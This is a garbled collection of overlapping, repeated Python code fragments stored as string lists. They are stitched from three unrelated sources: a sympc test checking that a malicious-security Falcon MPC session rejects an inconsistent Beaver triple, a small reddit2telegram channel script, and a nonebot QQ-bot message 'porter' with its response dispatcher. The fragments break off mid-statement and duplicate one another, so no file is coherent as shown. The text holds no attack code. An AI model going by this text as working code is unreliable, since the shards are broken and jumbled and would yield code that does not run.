= get_clients(3)", "session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create", "sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties =", "shape_x = (1,) shape_y = (1,) # create an inconsistent sharing,invoke a prrs", 
"with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\":", "g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\": shape_x, \"b_shape\":", "protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create an inconsistent sharing,invoke", "def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties,", "-> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session)", "(1,) # create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives(", "sympc.session import Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients)", "<gh_stars>10-100 # third party # third party import pytest from sympc.protocol import Falcon", "first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\":", "# third party import pytest from sympc.protocol import Falcon from sympc.session import Session", "from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties", "= get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,)", "party # third party import pytest from sympc.protocol import Falcon from sympc.session import", "\"beaver_mul\", 
session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\":", "# third party # third party import pytest from sympc.protocol import Falcon from", "falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y =", "prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x,", "CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, },", "sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session,", "\"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\": shape_x, \"b_shape\": shape_y},", "sympc.protocol import Falcon from sympc.session import Session from sympc.session import SessionManager from sympc.store", "= Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,)", "inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\":", "# create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\",", "an inconsistent sharing,invoke a prrs first 
session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={", "session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y,", "import Falcon from sympc.session import Session from sympc.session import SessionManager from sympc.store import", "a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\":", "Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) #", "session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\": shape_x,", "from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon =", "import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session", "parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x =", "from sympc.protocol import Falcon from sympc.session import Session from sympc.session import SessionManager from", "None: parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x", "shape_y = (1,) # create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with", "third party import pytest from sympc.protocol import Falcon from sympc.session 
import Session from", "(1,) shape_y = (1,) # create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x)", "pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties,", "Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create an inconsistent", "party import pytest from sympc.protocol import Falcon from sympc.session import Session from sympc.session", "create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session,", "get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y", "from sympc.session import Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def", "= Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create an", "Falcon from sympc.session import Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider", "third party # third party import pytest from sympc.protocol import Falcon from sympc.session", "pytest from sympc.protocol import Falcon from sympc.session import Session from sympc.session import SessionManager" ]
[]
[ "<filename>reddit2telegram/channels/ani_bm/app.py #encoding:utf-8 subreddit = 'ani_bm' t_channel = '@ani_bm' def send_post(submission, r2t): return r2t.send_simple(submission)" ]
[ "or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response,", "and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'],", "except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output))", "= msg_left else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response,", "'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue #", "request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot')", "message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] #", "'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id == self_id: logging.debug('===========", "== 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face',", "空文本检测 if text != '': request.msg = text elif message['type'] == 'image' and", "try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in", "on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses", "Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬',", "os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST = [] 
@on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True)", "for response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg =", "nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses import *", "ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await", "% os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif", "# 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行", "== 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif", "import Distributor from ....utils import image_url_to_path from ....paths import PATHS import os, logging,", "msg = msg_left else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif", "= str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像']", "msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg)", "先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record'", "distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot')", "continue # 空文本检测 if text != '': request.msg = text 
elif message['type'] ==", "await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save()", "from ....distributor import Distributor from ....utils import image_url_to_path from ....paths import PATHS import", "'[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id", "message['type'] == 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file'])", "response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs))", "await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: #", "for name in self_names: if name in text: # 被叫到时 bot_called = True", "'【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text != '': request.msg = text", "bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else:", "request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy',", "msg = response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) #", "% response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' %", "bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========')", "await eval('session.bot.%s' % 
response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await", "session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if", "message in session.ctx['message']: if message['type'] == 'text' and request.msg is None: text =", "request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in", "return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if", "session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s'", "else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' %", "request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is None: request.aud", "'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at',", "image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list):", "'$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img:", "for sign in [None, ',', ',', None]: text = text.strip(sign) # 消息段检测 if", "Distributor from ....utils import image_url_to_path from ....paths import PATHS import os, logging, traceback", "# BLACKLIST = [3288849221] BLACKLIST = [] 
@on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session:", "name in text: # 被叫到时 bot_called = True text = text.strip() while text[:len(name)]", "msg_left else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg)", "nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot] Completed nonebot porter ==========')", "= text elif message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img", "text = message['data']['text'].strip() # 呼叫检测 for name in self_names: if name in text:", "[MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot] Completed nonebot", "save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return", "2000 while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length]", "distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========')", "logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot] Completed", "BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession):", "在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id", "= True if 'group_id' in session.ctx.keys(): request.group_id = 
str(session.ctx['group_id']) else: # 私聊时 bot_called", "only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async", "except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc())", "text = text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for sign in", "'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔',", "bot_called = True for message in session.ctx['message']: if message['type'] == 'text' and request.msg", "request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor", "self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('===========", "% str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left =", "'子兔', 'xsx', '小石像'] bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left", "'请使用' in text and '新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"'", "for message in session.ctx['message']: if message['type'] == 'text' and request.msg is None: text", "session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时", "isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg", "',', ',', None]: text = text.strip(sign) # 消息段检测 if '请使用' in text and", "text: request.echo = True request.msg = 
'【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if", "= os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']),", "Resqust打包 request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id)", "# 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg)", "# 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] ==", "....responses import * from ....distributor import Distributor from ....utils import image_url_to_path from ....paths", "# 被叫到时 bot_called = True text = text.strip() while text[:len(name)] == name: text", "not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\"", "text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ' in text: request.echo =", "is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif", "= ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id ==", "in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']:", "request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text != '': request.msg", "image_url_to_path from ....paths import PATHS import os, logging, traceback # BLACKLIST = [3288849221]", "else: # 私聊时 bot_called = True for message in session.ctx['message']: if message['type'] ==", "'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== 
[MultiBot] Entered nonebot porter", "if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try:", "text != '': request.msg = text elif message['type'] == 'image' and request.img is", "Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called =", "'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\"", "= [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return", "name in self_names: if name in text: # 被叫到时 bot_called = True text", "== 'text' and request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for name", "# 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request)", "and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] ==", "request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id in", "session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误')", "session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message in", "else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg", "Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = 
Request() request.platform =", "None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type']", "session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id'])", "request.msg = text elif message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载", "elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号", "....distributor import Distributor from ....utils import image_url_to_path from ....paths import PATHS import os,", "# 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await", "= True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text !=", "and request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for name in self_names:", "'': request.msg = text elif message['type'] == 'image' and request.img is None: #", "= str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False", "at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000", "if '请使用' in text and '新版手机QQ' in text: request.echo = True request.msg =", "= image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is None: request.aud =", "response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text", "None]: text = text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ' in", "response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list): for response", "过长文本多次发送 
max_length = 2000 while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分", "str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if", "!= '': request.msg = text elif message['type'] == 'image' and request.img is None:", "from nonebot import CommandSession, on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests", "# 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request,", "text[-len(name):] == name: text = text[:-len(name)] for sign in [None, ',', ',', None]:", "'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue", "# 这轮超出部分为0时 msg = msg_left else: msg = '' elif isinstance(response, ResponseMusic): await", "'text' and request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for name in", "if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses())", "'xsx', '小石像'] bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot", "list): for response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg", "request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text", "Left nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot", "try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name)", "msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # 
msg只保留maxL内的部分 if isinstance(response, ResponseMsg):", "= [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message':", "text continue # 空文本检测 if text != '': request.msg = text elif message['type']", "from ....responses import * from ....distributor import Distributor from ....utils import image_url_to_path from", "....paths import PATHS import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST =", "用于执行Response序列 async def execute(response_list: list): for response in response_list: try: if isinstance(response, ResponseMsg)", "ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' %", "request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def", "= True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor =", "await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await", "allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def", "# 被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else:", "= '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id,", "response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id", "in text: 
request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测", "porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========')", "async def execute(response_list: list): for response in response_list: try: if isinstance(response, ResponseMsg) or", "await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await", "不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息", "= 2000 while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg =", "from ....paths import PATHS import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST", "'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心", "str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called", "....utils import image_url_to_path from ....paths import PATHS import os, logging, traceback # BLACKLIST", "return response_list # 用于执行Response序列 async def execute(response_list: list): for response in response_list: try:", "isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg", "[MultiBot] Left nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left", "if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id", "[None, ',', ',', None]: text = text.strip(sign) # 消息段检测 if '请使用' in text", "isinstance(response, ResponseImg): await session.send(message=img_msg) else: await 
session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output", "text elif message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img =", "await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg = msg_left else:", "Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('=========== [MultiBot] Completed nonebot porter", "== self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id in BLACKLIST:", "ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output =", "NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot]", "import on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses import * from", "elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not", "message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is", "await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left", "True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called =", "f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 
